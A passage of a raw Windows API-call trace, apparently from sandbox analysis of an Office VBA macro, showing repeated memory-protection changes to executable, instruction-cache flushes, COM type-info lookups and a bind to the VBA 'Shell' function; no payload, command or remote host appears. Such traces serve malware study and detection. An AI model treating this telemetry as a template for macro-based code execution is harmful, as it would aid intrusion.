lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc18, dwSize=0x2) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc6c, dwSize=0x45) returned 1 [0042.241] VirtualProtect (in: lpAddress=0x6cabc6c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac46c, dwSize=0x45) returned 1 [0042.241] VirtualProtect (in: lpAddress=0x6cac46c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e9, dwSize=0x8) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e8, dwSize=0x8) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4f8, dwSize=0x2) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac54c, dwSize=0x45) returned 1 [0042.241] VirtualProtect (in: lpAddress=0x6cac54c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac5d4, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6cac5d4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6c0, dwSize=0x2) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac714, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6cac714, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac79c, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6cac79c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac819, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac818, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac828, dwSize=0x2) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac90c, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6cac90c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac994, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6cac994, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca20, dwSize=0x2) returned 1 [0042.242] GetCurrentProcess () returned 0xffffffffffffffff [0042.242] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca74, dwSize=0x45) returned 1 [0042.242] VirtualProtect (in: lpAddress=0x6caca74, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacb5c, dwSize=0x45) returned 1 [0042.243] VirtualProtect (in: lpAddress=0x6cacb5c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd9, dwSize=0x8) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd8, dwSize=0x8) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbe8, dwSize=0x2) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacc3c, dwSize=0x45) returned 1 [0042.243] VirtualProtect (in: lpAddress=0x6cacc3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.243] GetCurrentProcess () returned 0xffffffffffffffff [0042.243] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caccc4, dwSize=0x45) returned 1 [0042.243] VirtualProtect (in: lpAddress=0x6caccc4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.243] IUnknown:AddRef (This=0x6a6e948) returned 0xa [0042.243] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6a6e948) returned 0x9 [0042.243] IUnknown:AddRef (This=0x6ccf078) returned 0x4 [0042.243] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6ccf078) returned 0x3 [0042.243] IUnknown:AddRef (This=0x6a6e9a8) returned 0x2 [0042.243] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6a6e9a8) returned 0x1 [0042.243] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.243] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.243] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.243] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.243] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.243] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.243] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.243] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.244] IMalloc:Realloc (This=0x7feffc15380, pv=0x6858470, cb=0x2000) returned 0x6678120 [0042.244] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.244] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.244] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x180ef0, pDummy=0x0 | out: ppTypeAttr=0x180ef0, pDummy=0x0) returned 0x0 [0042.244] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.244] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.244] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.244] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181688 | out: ppvObject=0x181688*=0x0) returned 0x80004002 [0042.244] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.244] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x181680, pDummy=0x10 | out: ppTypeAttr=0x181680, pDummy=0x10) returned 0x0 [0042.244] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.244] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x181678 | out: pRefType=0x181678*=0x1302) returned 0x0 [0042.244] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x181690 | out: ppTInfo=0x181690*=0x6ceef68) returned 0x0 [0042.244] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.244] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x181680, pDummy=0x181660 | out: ppTypeAttr=0x181680, pDummy=0x181660*=0x1816a0) returned 0x0 [0042.244] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.244] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x181678 | out: pRefType=0x181678*=0xf) returned 0x0 [0042.244] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x181690 | out: ppTInfo=0x181690*=0x6bbd1c8) returned 0x0 [0042.245] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x181680, pDummy=0x181658 | out: ppTypeAttr=0x181680, pDummy=0x181658*=0xf) returned 0x0 [0042.245] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.245] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.245] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x181700, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1060 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1060) returned 0x0 [0042.245] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x181610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.245] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.245] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x180f00, pDummy=0x0 | out: ppTypeAttr=0x180f00, pDummy=0x0) returned 0x0 [0042.245] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.245] ITypeComp:RemoteBind (in: This=0x6990970, szName="Shell", lHashVal=0x10d756, wFlags=0x1, ppTInfo=0x181588, pDescKind=0x18159c, ppFuncDesc=0x1815a0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x181588*=0x6bb4b88, pDescKind=0x18159c*=1, ppFuncDesc=0x1815a0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb4b88, ppTypeAttr=0x181590, pDummy=0x1 | out: ppTypeAttr=0x181590, pDummy=0x1) returned 0x0 [0042.245] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb4b88) returned 0x0 [0042.245] ITypeInfo:GetRefTypeInfo (in: This=0x6bb4b88, hreftype=0x400, ppTInfo=0x1812c8 | out: ppTInfo=0x1812c8*=0x6bb4768) returned 0x0 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181498 | out: ppvObject=0x181498*=0x0) returned 0x80004002 [0042.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb4768, ppTypeAttr=0x181318, pDummy=0x10 | out: ppTypeAttr=0x181318, pDummy=0x10) returned 0x0 [0042.245] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb4768) returned 0x0 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181020 | out: ppvObject=0x181020*=0x0) returned 0x80004002 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181010 | out: ppvObject=0x181010*=0x0) returned 0x80004002 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181018 | out: ppvObject=0x181018*=0x0) returned 0x80004002 [0042.245] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb4768, ppTypeAttr=0x181048, pDummy=0x10 | out: ppTypeAttr=0x181048, pDummy=0x10) returned 0x0 [0042.245] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb4768) returned 0x0 [0042.245] IUnknown:AddRef (This=0x6bb4768) returned 0x2 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1811c0 | out: ppvObject=0x1811c0*=0x0) returned 0x80004002 [0042.245] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1811b8 | out: ppvObject=0x1811b8*=0x0) returned 0x80004002 [0042.245] IUnknown:Release (This=0x6bb4768) returned 0x1 [0042.245] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6bb4b88, memid=1610612745, invkind=1, pFuncIndex=0x181328 | out: pFuncIndex=0x181328*=0x9) returned 0x0 [0042.245] ITypeInfo2:GetParamCustData (in: This=0x6bb4b88, indexFunc=0x9, indexParam=0x1, GUID=0x7fee45e4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x181338 | out: pVarVal=0x181338*(varType=0x0, wReserved1=0x66e, wReserved2=0x0, wReserved3=0x0, varVal1=0x69d7530, varVal2=0x182048)) returned 0x0 [0042.245] IUnknown:Release (This=0x6bb4b88) returned 0x1 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1813f0 | out: ppvObject=0x1813f0*=0x6bb4b88) returned 0x0 [0042.246] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6bb4b88, memid=1610612745, invkind=1, pFuncIndex=0x181430 | out: pFuncIndex=0x181430*=0x9) returned 0x0 [0042.246] ITypeInfo2:GetFuncCustData (in: This=0x6bb4b88, index=0x9, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x181448 | out: pVarVal=0x181448*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x10d756)) returned 0x0 [0042.246] IUnknown:Release (This=0x6bb4b88) returned 0x1 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1812e8 | out: ppvObject=0x1812e8*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1813a8 | out: ppvObject=0x1813a8*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4768, riid=0x7fee45e2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181280 | out: ppvObject=0x181280*=0x0) returned 0x80004002 [0042.246] IUnknown:Release (This=0x6bb4768) returned 0x1 [0042.246] IUnknown:AddRef (This=0x6bb4b88) returned 0x2 [0042.246] ITypeInfo:LocalReleaseFuncDesc (This=0x6bb4b88) returned 0x0 [0042.246] IUnknown:Release (This=0x6bb4b88) returned 0x1 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1816b8 | out: ppvObject=0x1816b8*=0x0) returned 0x80004002 [0042.246] IUnknown:AddRef (This=0x6bb4b88) returned 0x2 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181640 | out: ppvObject=0x181640*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181610 | out: ppvObject=0x181610*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181600 | out: ppvObject=0x181600*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181608 | out: ppvObject=0x181608*=0x0) returned 0x80004002 [0042.246] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb4b88, ppTypeAttr=0x181638, pDummy=0x10 | out: ppTypeAttr=0x181638, pDummy=0x10) returned 0x0 [0042.246] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb4b88) returned 0x0 [0042.246] IUnknown:AddRef (This=0x6bb4b88) returned 0x3 [0042.246] IUnknown:Release (This=0x6bb4b88) returned 0x2 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181828 | out: ppvObject=0x181828*=0x0) returned 0x80004002 [0042.246] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181820 | out: ppvObject=0x181820*=0x0) returned 0x80004002 [0042.246] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x181060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.246] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x181060, pbstrName=0x0, pwOrdinal=0x181080 | out: pBstrDllName=0x181060*=0x0, pbstrName=0x0, pwOrdinal=0x181080*=0x12f0) returned 0x0 [0042.246] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x181060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x181060, pwOrdinal=0x500000000) returned 0x0 [0042.246] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x43) returned 1 [0042.246] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.246] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cad200 [0042.246] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cb8e80, cb=0x400) returned 0x6d08c00 [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 